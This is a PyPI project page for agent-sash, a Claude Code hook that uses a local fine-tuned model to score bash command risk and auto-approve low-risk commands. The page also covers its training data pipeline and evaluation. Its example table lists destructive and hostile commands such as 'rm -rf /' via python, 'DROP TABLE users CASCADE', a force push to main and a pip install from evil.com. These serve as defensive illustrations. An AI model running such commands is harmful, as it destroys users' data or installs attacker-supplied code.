Minimal local Claude Code hook client for command risk scoring

Project description

agent-sash

A Claude Code hook that uses a local LLM to auto-approve safe bash commands.

Claude Code's allowlists work for simple cases (git status, ls) but break down for commands like python3 -c ... or sed that need to be broadly allowed for legitimate use yet can do real damage depending on their arguments. The alternative -- prompting every time -- trains users to reflexively approve, which is worse than no permission check at all.

agent-sash runs a small model locally that scores each bash command's risk from 0 to 1. Safe commands flow through automatically. Risky ones still prompt you.

Command	Score	Decision
`python3 -c "print(42)"`	0.0	allowed
`python3 -c "import os; os.system('rm -rf /')"`	1.0	prompts
`sed -i s/foo/bar/g config.yaml`	0.3	allowed
`sed -i s/foo/bar/g /etc/nginx/nginx.conf`	0.7	prompts
`git push origin feature-branch`	0.4	allowed
`git push --force origin main`	0.9	prompts
`psql -c "SELECT count(*) FROM users"`	0.0	allowed
`psql -c "DROP TABLE users CASCADE"`	0.8	prompts
`pip install requests`	0.2	allowed
`pip install requests --index-url http://evil.com/simple`	0.6	prompts

Quick start

Note: The scoring model was fine-tuned and evaluated specifically for this use case, but it is a language model lacking broader context about your environment and risk tolerance, and may incorrectly allow commands. Take care with what credentials and resources are accessible from the environment Claude Code runs in.

Requirements: macOS with Apple Silicon, Python 3.13+, uv

1. Install

uv tool install agent-sash

2. Add the hook

Add this to your ~/.claude/settings.json:

{
  "hooks": {
    "PreToolUse": [
      {
        "matcher": "Bash",
        "hooks": [
          {
            "type": "command",
            "command": "agent-sash claude-hook"
          }
        ]
      }
    ]
  }
}

3. Start a new Claude Code session

That's it. The model server auto-starts on the first bash command. First run downloads the model (~1.5GB).

To pre-warm the server so there's no delay on the first command:

agent-sash start

To shut it down:

agent-sash stop

How it works

agent-sash registers as a PreToolUse hook on Bash commands. When Claude Code is about to run a shell command, a local model scores its risk from 0.0 to 1.0. Below the threshold (0.5), the command is auto-allowed. Above it, the user is prompted. On any error, agent-sash defaults to prompting.

The model is cwrn/Qwen3.5-2B-SHGuard-MLX-Q4, a full fine-tune of Qwen3.5-2B quantized to Q4 via mlx-lm (~1.0GB on disk, ~1.3GB resident).

BF16: cwrn/Qwen3.5-2B-SHGuard

Data pipeline

The training set is 90,000 examples (85,500 train / 4,500 validation).

Extraction. Shell commands were pulled from four coding-agent trajectory datasets: Nemotron-Terminal-Corpus, CoderForge, SWE-rebench-openhands, and Nemotron-SWE. Per-source extractors normalized each format into a common schema, dropping comment-only lines, control inputs, scaffold actions, and editor payloads. Shell blocks and YAML run: steps from operational docs (Kubernetes, Docker, PostgreSQL, GitHub, rsync deployments) filled in live-environment coverage. ~4.6M candidate commands total.

Deduplication. MinHash LSH over character n-grams (3/4/5-gram, 14 buckets × 8 hashes, Jaccard threshold ~0.8) via datatrove.

Subsampling. TF-IDF + MiniBatchKMeans (K=2,000) selected 250k structurally diverse commands from the deduplicated pool, with quotas proportional to cluster size and a structure bias toward pipes, redirects, heredocs, and nested interpreters.

Teacher labeling. Qwen3.5-35B-A3B scored each command against a risk rubric (0.0 = read-only/ephemeral through 1.0 = potentially irreversible with wide blast radius) with JSON schema enforcement.

Resampling. The raw labeled distribution is heavily skewed toward low-risk commands. Probabilistic resampling keeps all examples scoring ≥ 0.7, applies structure multipliers at p80/p95, and oversamples the ≥ 0.4 tail to 10% of the pool.

Synthetic augmentation. Even after resampling, coverage of shared-environment mutations (force pushes, cluster disruption, remote sync with deletion) was thin. data-designer generated synthetic commands from a scenario grid over 7 axes (environment × resource × impact × scope × access × frame × guardrail), filtered to score ≥ 0.7 with valid shell syntax. 4,143 rows accepted.

Rewrite augmentation. Low-risk natural commands were rewritten into high-risk variants using data-designer, then re-scored by the teacher. Accepted if the rewrite scored ≥ 0.6 with a delta ≥ 0.4 from the original and Jaccard similarity ≥ 0.6. 538 rewrite rows were retained.

Final composition: 57,791 natural / 538 rewrite / 4,143 synthetic.

Training

Full fine-tune of Qwen3.5-2B. 3 epochs, effective batch size 32, learning rate 2e-5, cosine schedule, bf16. Best checkpoint at step 4,500 (eval loss 0.3116).

Base Qwen3.5-2B with the full rubric in-context scores a 0.920 Spearman vs teacher. Without the rubric, it drops to 0.610. Fine-tuning closes that gap -- the trained model matches the rubric-prompted baseline using only the raw command as input.

Evaluation

38-command benchmark with human-specified target score ranges:

Checkpoint	Spearman vs teacher	MSE	Within human range	Latency (p50)
BF16	0.972	0.0058	78.9%	—
MLX Q4	0.952	0.0074	73.7%	0.69s

Project details

Release history Release notifications | RSS feed

0.2.0

Mar 11, 2026

This version

0.1.1

Mar 10, 2026

0.1.0

Mar 10, 2026

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

agent_sash-0.1.1.tar.gz (7.4 kB view details)

Uploaded Mar 10, 2026 Source

Built Distribution

If you're not sure about the file name format, learn more about wheel file names.

The dropdown lists show the available interpreters, ABIs, and platforms. Enable javascript to be able to filter the list of wheel files.

agent_sash-0.1.1-py3-none-any.whl (9.6 kB view details)

Uploaded Mar 10, 2026 Python 3

File details

Details for the file agent_sash-0.1.1.tar.gz.

File metadata

Download URL: agent_sash-0.1.1.tar.gz
Upload date: Mar 10, 2026
Size: 7.4 kB
Tags: Source
Uploaded using Trusted Publishing? No
Uploaded via: uv/0.10.9 {"installer":{"name":"uv","version":"0.10.9","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"macOS","version":null,"id":null,"libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":null}

File hashes

Hashes for agent_sash-0.1.1.tar.gz
Algorithm	Hash digest
SHA256	`4b132f18d64331a4153803d62d41ad0be9b2e7e310290bb95256b5f8339f9ff2`
MD5	`186edadc2f0ff50e8dffb6a22d7a267a`
BLAKE2b-256	`51f695c7986bec2514255774fa76f6ff15c94407f7aacca031e72bf44762e917`

See more details on using hashes here.

File details

Details for the file agent_sash-0.1.1-py3-none-any.whl.

File metadata

Download URL: agent_sash-0.1.1-py3-none-any.whl
Upload date: Mar 10, 2026
Size: 9.6 kB
Tags: Python 3
Uploaded using Trusted Publishing? No
Uploaded via: uv/0.10.9 {"installer":{"name":"uv","version":"0.10.9","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"macOS","version":null,"id":null,"libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":null}

File hashes

Hashes for agent_sash-0.1.1-py3-none-any.whl
Algorithm	Hash digest
SHA256	`d7c62537c45b9799f39c8a08475003f30d22b7ab69e1248bda71e3473fa80f43`
MD5	`8121a2bd692cfc2b8771f7a031cf1253`
BLAKE2b-256	`30af5838aa632e9181f76bf9d23f81ce547c62e2b0d385b77f01dee070af333d`

See more details on using hashes here.

agent-sash 0.1.1

Navigation

Verified details

Maintainers

Unverified details

Meta

Project description

agent-sash

Quick start

1. Install

2. Add the hook

3. Start a new Claude Code session

How it works

Data pipeline

Training

Evaluation

Project details

Verified details

Maintainers

Unverified details

Meta

Release history Release notifications | RSS feed

Download files

Source Distribution

Built Distribution

File details

File metadata

File hashes

File details

File metadata

File hashes